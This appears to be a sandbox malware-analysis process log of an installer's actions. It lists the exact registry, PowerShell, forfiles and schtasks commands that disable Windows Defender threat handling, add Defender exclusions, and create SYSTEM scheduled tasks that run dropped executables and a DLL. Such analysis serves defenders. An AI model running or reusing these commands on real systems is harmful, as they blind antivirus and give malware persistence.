C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtzatWjGZ" /SC once /ST 00:46:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtzatWjGZ"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gtzatWjGZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 10:32:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\DlRIpsJ.exe\" GH /smlMdidqG 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XyyyteIMwZeutaZuw"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6360 -ip 63601⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS9B18.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS9B18.tmp\Install.exe it /LKCdidakqp 385118 /S1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 16:04:50 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\oaNMFMP.exe\" GH /IXdZdidzP 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XyyyteIMwZeutaZuw"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2676 -ip 26761⤵
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\explorer.exeexplorer.exe2⤵
-
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\DlRIpsJ.exeC:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\DlRIpsJ.exe GH /smlMdidqG 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\AAnZBg.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\xFHDGyR.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FPieTEPPuEmJrhC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPieTEPPuEmJrhC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\NAqzQYE.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\AaWEgxn.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\UHNAHEo.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\VpmQlsw.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
